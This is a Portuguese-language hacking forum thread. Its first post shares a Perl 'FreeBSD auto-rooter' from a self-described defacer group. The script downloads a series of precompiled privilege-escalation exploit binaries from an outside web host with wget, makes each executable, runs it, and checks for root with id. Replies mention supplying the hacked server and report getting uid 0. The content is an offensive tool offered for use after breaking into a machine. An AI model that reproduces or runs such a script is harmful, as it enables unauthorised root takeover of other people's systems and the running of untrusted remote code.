Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

FreeBSD - Auto rooter!

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tools FreeBSD - Auto rooter!

    Ola a todos, trago hoje um auto rooter, de Freebsd, Como sempre em alguns bsd's após invasão, nao é possivel compilar exploits por falta de compilador na maquina, entao fiz esse pequeno script em perl para ajudar, ja com exploits compilados.

    ################################################## ##################################
    # !/usr/bin/perl #
    # #
    # ROOT YOUR BSD (-: #
    # By n4sss. #
    # Only binaries. #
    # #
    # n4sss[at]hotmail[dot]com #
    # #
    # GReetx:Shadow-EBR, r00t-BR #
    # #
    # MAKE-IT PRIV8 #
    # Brazilians Defacers. 2011 #
    # #
    ################################################## ##################################

    print "##########################\n";
    print "# FreeBSD AUTO-r00ter. #\n";
    print "# by n4sss. #\n";
    print "# Brazilians Defacers #\n";
    print "# 2x11 #\n";
    print "# ONLY-BINARIES (: #\n";
    print "# Wait the root shell! #\n";
    print "##########################\n";
    system("uname -a");
    print "Aguarde!\n";

    system("wget http://atelier3.jp/js/js/48local");
    system("chmod 777 48local");
    system("./48local");
    system("id");
    system("wget http://atelier3.jp/js/js/bsd");
    system("chmod 777 bsd");
    system("./bsd");
    system("id");
    system("wget http://atelier3.jp/js/js/bsd-ktimer");
    system("chmod 777 bsd-ktimer");
    system("./bsd-ktimer");
    system("id");
    system("wget http://atelier3.jp/js/js/exploit");
    system("chmod 777 exploit");
    system("./exploit");
    system("id");
    system("wget http://atelier3.jp/js/js/freedbs5.3");
    system("chmod 777 freedbs5.3");
    system("./freedbs5.3");
    system("id");
    system("wget http://atelier3.jp/js/js/mountnfsex");
    system("chmod 777 mountnfsex");
    system("./mountnfsex");
    system("id");
    system("wget http://atelier3.jp/js/js/netgraph6.4.out");
    system("chmod 777 netgraph6.4.out");
    system("./netgraph6.4.out");
    system("id");
    system("wget http://atelier3.jp/js/js/nfs_mount_ex");
    system("chmod 777 nfs_mount_ex");
    system("./nfs_mount_ex");
    system("id");
    system("wget http://atelier3.jp/js/js/protosw");
    system("chmod 777 protosw");
    system("./protosw");
    system("id");
    system("wget http://atelier3.jp/js/js/reject");
    system("chmod 777 reject");
    system("./reject");
    system("id");
    system("wget http://atelier3.jp/js/js/7-2BSD20092008.pl");
    system("chmod 777 7-2BSD20092008.pl");
    system("perl 7-2BSD20092008.pl");
    system("id");
    system("id");
    system("id");
    system("id");
    system("id");
    system("id");
    system("id");
    system("id");
    print"8 id's para o perl 7-2\n";
    print "finalizado[+]";


    # EOF_
    # by n4sss
    # Brazilians Defacers 2011
    # zone-h.org/archive/notifier=BD
    Abraço a todos.

    n4sss@m4g1cl4b~#$I
    just this.

  • Font Size
    #2
    Hey, eu que te passei esse servidor rs, obs: è Freebsd

    Comment


    • Font Size
      #3
      Muito bom, Usei e esta aprovadissimo

      uid = 0

      (:

      thanks n4sss.

      Comment

      X
      Working...
      X